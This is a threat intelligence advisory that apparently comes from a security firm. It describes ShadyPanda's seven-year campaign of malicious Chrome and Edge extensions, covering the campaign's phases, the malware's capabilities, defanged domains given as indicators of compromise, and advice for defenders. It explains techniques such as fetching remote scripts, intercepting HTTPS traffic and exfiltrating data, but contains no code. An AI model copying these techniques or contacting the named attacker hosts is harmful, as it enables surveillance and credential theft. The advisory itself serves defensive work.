ShadyPanda’s 7-Year Malware Campaign Infected 4.3 Million Chrome and Edge users

Published Date: December 3, 2025
Category: ShadowOpsIntel
Share:

ShadyPanda is a highly persistent browser-based threat actor responsible for a 7-year malware campaign that infected over 4.3 million users of Google Chrome and Microsoft Edge. This adversary weaponized browser extensions that initially operated as legitimate utilities, later turning them into powerful spyware and remote access tools. The campaign showcases how deeply a trusted extension can embed itself in user environments before activating malicious behavior.

Severity: High

Threat Details

  1. Threat Actor: ShadyPanda – named by KOI Research – unknown origin but with infrastructure heavily based in China.
  2. Campaign Scale: Over 4.3 million users infected via 10+ browser extensions across multiple marketplaces since 2018.
  3. Capabilities of the Malware:
    • Remote Code Execution: Via hourly pings to api.extensionplay[.]com – dynamically downloads & executes scripts.
    • Browser Surveillance: Logs full browsing history, search behavior, scrolls, clicks, cookies.
    • Anti-analysis Features: Detects dev tools, executes benign code in sandboxed environments.
    • MITM Capabilities: Service workers modify HTTPS traffic, allowing credential theft and content injection.
    • Data Exfiltration: Encrypted AES payloads to domains like cleanmasters[.]store.
  4. Campaign Evolution Timeline
    • Phase 1: Affiliate Fraud via Wallpaper Extensions (2023)
      • 145 extensions used to hijack affiliate traffic (Amazon, eBay, Booking.com)
      • Injected tracking codes and harvested browsing data for monetization
    • Phase 2: Search Hijacking (Early 2024)
      • Extensions redirected search queries to trovi[.]com
      • Real-time query harvesting from fields, even before submission
      • Cookie theft and user fingerprinting
    • Phase 3: Remote Code Execution Backdoor (Mid-2024)
      • Trusted extensions (e.g., Clean Master) turned malicious via auto-updates
      • RCE framework pushed to 300,000 users
      • Fully modular – enabled credential theft, surveillance, content injection
    • Phase 4: Spyware Empire (2023–Present)
      • 5 extensions from Starlab Technology infected over 4 million users
      • Still active in Edge Marketplace
      • WeTab is flagship spyware with:
        • Keystroke-level monitoring
        • Click tracking with pixel-level precision
        • Full browser fingerprinting
        • Data exfiltrated to 17 domains in China
  5. Current Status
    • Clean Master and related extensions from Phase 3 have been removed.
    • Phase 4 spyware extensions are still live in the Microsoft Edge store and actively collecting data.
    • Infrastructure remains functional and capable of executing ransomware, supply chain attacks, or credential harvesting at any time.

Recommendations

  1. Immediately review all installed browser extensions in both Chrome and Edge. Uninstall any that are no longer essential, especially:
    • Extensions from the publisher Starlab Technology.
    • Any extension named Clean Master or WeTab 新标签页 (WeTab New Tab Page).
    • Any extension that has excessive or unnecessary permissions (e.g., access to all websites, reading browsing history) relative to its advertised function (e.g., a simple wallpaper tool).
  2. If you used any of the compromised extensions (like Clean Master), the browser profile should be considered compromised.
    • Immediately change passwords for critical accounts (email, banking, corporate access) as the RCE backdoor could have captured credentials or session cookies.
    • Clear all browsing history, cookies, and cache for the infected browser.
  3. Ensure your browser’s security settings (e.g., Google Chrome’s Enhanced Protection) are enabled. This provides real-time warnings against newly dangerous sites, downloads, and extensions.
  4. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/d79f04982129aff7331e4e12a87b87635ffc859c4df39af962ea4c7f76cab62f/iocs

Source:

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.